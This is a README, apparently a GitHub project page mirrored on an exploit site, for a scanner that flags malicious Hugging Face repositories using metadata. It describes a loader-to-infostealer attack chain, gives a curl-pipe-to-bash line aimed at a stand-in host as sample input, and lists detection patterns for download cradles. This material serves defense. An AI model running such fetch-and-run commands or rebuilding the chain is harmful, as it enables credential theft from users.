Share
## https://sploitus.com/exploit?id=AE42F09E-CF8A-5D39-8E20-0DA486FE5B13
# hf-model-provenance-scanner
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
> **Scan any Hugging Face repository for malicious signals _before_ the model is ever loaded.**
> Zero runtime dependencies. Stdlib only. Works offline.
---
## The Attack That Prompted This Tool
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
**May 14, 2026 โ 06:00 UTC.** A repository called `Open-OSS/privacy-filter` appeared on Hugging Face. By midnight it had reached **#1 trending** with **244,000 downloads in 18 hours**.
The attack chain was three stages:
```
loader.py โ PowerShell download cradle โ Rust infostealer
```
1. The README told users to run `python loader.py`.
2. `loader.py` fetched a PowerShell script from a CDN.
3. The PowerShell script compiled and executed a Rust binary that exfiltrated SSH keys, AWS credentials, and browser cookies.
The repo was removed at 00:18 UTC the next day. By then it was too late for 244,000 pull operations.
**No existing tool would have caught this before a download.**
- **Garak** tests a loaded model's outputs โ useless if you never wanted to load it.
- **ModelScan** detects pickle exploits _inside_ weight files โ it can't flag loader.py or a missing SBOM.
- **Vigil / Rebuff** protect LLM _inputs_ at runtime โ a completely different threat surface.
`hf-model-provenance-scanner` runs _before_ any file is downloaded and detects the metadata and structural signals of this class of attack.
---
## Quick Start
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
### As a library
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
```python
from hf_scanner.scanner import scan
# Populate from your own HF API call, a CI pipeline, or manual review.
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
repo_metadata = {
"repo_id": "Open-OSS/privacy-filter",
"author": "Open-OSS",
"files": ["loader.py", "config.json", "README.md"],
"readme": "Run: curl https://release.open-oss.io/setup.sh | bash",
"downloads_24h": 244_000,
"created_at": "2026-05-14T00:00:00Z",
"author_repo_count": 0,
"likes": 12,
}
result = scan(repo_metadata)
print(result.risk_level) # 'CRITICAL'
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
print(result.recommendation) # 'BLOCK'
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
print(result.risk_score) # e.g. 95
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
for finding in result.findings:
print(f"[{finding.severity}] {finding.title}")
```
### As a CLI
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
```bash
pip install hf-model-provenance-scanner
# From a JSON metadata file
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
hf-scan --meta repo_meta.json
# Pipe JSON from stdin
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
echo '{"repo_id":"Open-OSS/privacy-filter","author":"Open-OSS","files":["loader.py"],"downloads_24h":244000,"author_repo_count":0}' \
| hf-scan
# Machine-readable JSON output
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
hf-scan --meta repo_meta.json --format json
# Exit codes: 0 = ALLOW, 1 = REVIEW, 3 = BLOCK
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
```
---
## Sample Terminal Output
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
HF Model Provenance Scanner
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Repo : Open-OSS/privacy-filter
Scanned: 2026-05-14T06:32:11+00:00
Risk Score : [โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ] 89/100
Risk Level : CRITICAL
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ ๐ซ BLOCK โ DO NOT LOAD THIS MODEL โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Findings (7 total):
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1. [CRITICAL ] Known malicious loader script: 'loader.py'
Check : code_execution
Desc : The file 'loader.py' has a name associated with malware
delivery loaders. The May 2026 attack used this filename.
Evidence: file='loader.py'
2. [CRITICAL ] curl-pipe-to-shell pattern detected
Check : code_execution
Desc : The README/model card contains an instruction that would
execute remote code on the user's machine.
Evidence: snippet='curl https://release.open-oss.io/setup.sh | bash'
3. [HIGH ] Suspicious download velocity: 244,000 in 24 h
Check : metadata_trust
Desc : The repo received 244,000 downloads in its first 24 hours.
Evidence: downloads_24h=244000, threshold=10000
4. [HIGH ] Very new repository: 0.3 days old
Check : metadata_trust
Desc : Repos younger than 7 days have no track record.
Evidence: created_at='2026-05-14T00:00:00Z', age_days=0.3
5. [MEDIUM ] Author 'Open-OSS' has no other public repositories
Check : metadata_trust
Evidence: author='Open-OSS', author_repo_count=0
6. [MEDIUM ] No trust artifacts (model card, SBOM, provenance)
Check : sbom_check
Evidence: model_card=False, sbom=False, provenance=False
7. [MEDIUM ] Repository has no model weights but contains scripts
Check : pickle_exploit
Evidence: script_files=['loader.py']
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
---
## Checks Reference
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
### 1. `org_impersonation` โ Brand impersonation detection
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
| What it detects | Why it matters |
|---|---|
| Author username within edit-distance โค 2 of a known-safe org | `0penai`, `micros0ft`, `meta_llama` fool humans at a glance |
| Verbatim boilerplate from a real org's model card | Attacker copies real marketing text to appear legitimate |
**Known-safe orgs:** `openai`, `meta-llama`, `google`, `microsoft`, `anthropic`, `mistralai`, `huggingface`, `stability-ai`, `cohere`, and more.
**Severity:** CRITICAL for any match.
---
### 2. `pickle_exploit` โ Unsafe serialisation detection
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
| What it detects | Why it matters |
|---|---|
| `.pkl`, `.pt`, `.bin`, `.pth` files without `.safetensors` alternative | `torch.load()` on a pickle file = arbitrary code execution |
| `pickle.load()` / `torch.load()` / `np.load(allow_pickle=True)` in README | Instructs users to use the dangerous path |
| No model weights but scripts present | Delivery mechanism, not a real model |
**Severity:** HIGH for pickle-without-safetensors; INFO if safetensors is also present.
---
### 3. `code_execution` โ Executable script detection
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
| File / pattern | Severity |
|---|---|
| `loader.py`, `downloader.py`, `dropper.py`, `stager.py` | CRITICAL |
| `*.ps1`, `*.bat`, `*.cmd`, `*.vbs` | CRITICAL |
| `curl โฆ \| bash`, `wget โฆ \| sh` in README | CRITICAL |
| `IEX`, `Invoke-Expression`, `DownloadString` in README | CRITICAL |
| `install.sh`, `run.sh`, `*.exe`, `*.elf` | HIGH |
| `subprocess.run()`, `os.system()` in README | HIGH |
| `setup.py`, `Makefile` | MEDIUM |
---
### 4. `metadata_trust` โ Account and velocity signals
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
| Signal | Threshold | Severity |
|---|---|---|
| Repo age | 10,000 in 24 h | HIGH |
| Author repo count | 0 other repos | MEDIUM |
| Like/download ratio | 50 (purchased likes) | LOW |
---
### 5. `sbom_check` โ Provenance artifact checks
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
| Artifact | Severity if missing |
|---|---|
| Model card (`README.md` with `model-index` YAML) | LOW |
| SBOM (`sbom.json`, `sbom.spdx`, `cyclonedx.json`) | INFO |
| Provenance (`provenance.json`, `attestation.json`) | INFO |
| All three missing together | MEDIUM (escalated) |
---
### 6. `supply_chain` โ Dependency analysis
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
| Pattern | Severity |
|---|---|
| `--index-url` pointing away from PyPI | HIGH |
| Direct wheel/tarball URL installs | HIGH |
| Known typo-squatted package names | HIGH |
| `git+https://` dependencies | MEDIUM |
| `--extra-index-url` non-PyPI | MEDIUM |
| > 3 unpinned dependencies | LOW |
---
## Risk Scoring Formula
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
The 0โ100 risk score uses **diminishing returns** so that one CRITICAL finding doesn't max out the score, but two or more CRITICAL findings definitely do.
```
score = min(100, ฮฃ severity_weight(i) ร 1 / (1 + 0.15 ร same_severity_count(i)))
```
Severity weights:
| Severity | Base weight |
|---|---|
| CRITICAL | 55 |
| HIGH | 35 |
| MEDIUM | 18 |
| LOW | 8 |
| INFO | 2 |
Score โ risk level โ recommendation:
| Score | Risk Level | Recommendation |
|---|---|---|
| 0 | SAFE | ALLOW |
| 1โ15 | LOW | ALLOW |
| 16โ35 | MEDIUM | REVIEW |
| 36โ60 | HIGH | REVIEW |
| 61โ100 | CRITICAL | BLOCK |
**Hard override:** Any CRITICAL-severity finding forces `recommendation = BLOCK`, regardless of score.
---
## `repo_metadata` Schema
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
```python
{
# Required
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
"repo_id": str, # "author/model-name"
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
# Strongly recommended
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
"author": str, # HF username or org slug
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
"files": list[str], # filenames in the repo root
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
"readme": str, # raw README.md content
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
"created_at": str, # ISO-8601 UTC "2026-05-14T00:00:00Z"
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
"author_repo_count": int, # how many repos the author has
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
"downloads_24h": int, # downloads in first 24 hours
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
"downloads_last_month": int,
"likes": int,
# Optional
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
"requirements": str, # raw requirements.txt content
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
"tags": list[str],
"last_modified": str, # ISO-8601 UTC
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
}
```
All keys are optional. Missing keys are treated conservatively (worst-case assumption for trust signals).
---
## What No Other Tool Does
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
| Tool | What it does | What it misses |
|---|---|---|
| **Garak** | Red-teams a *loaded* model's output safety | Can't run before you download |
| **ModelScan** | Scans pickle bytecode inside weight files | Requires the file to be present; misses loader.py, missing SBOM |
| **Vigil / Rebuff** | Detects prompt injection at *runtime* | Completely different threat surface |
| **PurpleLlama** | Model output safety benchmarks | Post-load evaluation only |
| **Agentic Radar** | Scans agentic workflow code | Not focused on model provenance |
| **hf-model-provenance-scanner** | **Pre-download supply-chain audit** | _This is the gap_ |
The core insight: **the May 2026 attack was detectable from metadata alone**, without downloading a single byte. `loader.py` + 244K downloads in 24h + zero-repo account + no model card = BLOCK. No existing tool made this call.
---
## Installation
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
```bash
# From PyPI (once published)
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
pip install hf-model-provenance-scanner
# From source
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
git clone https://github.com/example/hf-model-provenance-scanner
cd hf-model-provenance-scanner
pip install -e ".[dev]"
```
**Requirements:** Python โฅ 3.11. Zero runtime dependencies.
---
## Development
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
```bash
# Run tests
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
python -m pytest tests/ -v
# Lint
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
ruff check src/ tests/
# Run the CLI against a sample payload
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
echo '{"repo_id":"Open-OSS/privacy-filter","author":"Open-OSS","files":["loader.py"],"downloads_24h":244000,"author_repo_count":0,"created_at":"2026-05-14T00:00:00Z"}' \
| python -m hf_scanner.scanner
```
---
## License
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
MIT โ see [LICENSE](LICENSE).
---
## Contributing
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
Pull requests welcome. Please add tests for any new check.
Read [CONTRIBUTING.md](CONTRIBUTING.md) before opening a PR.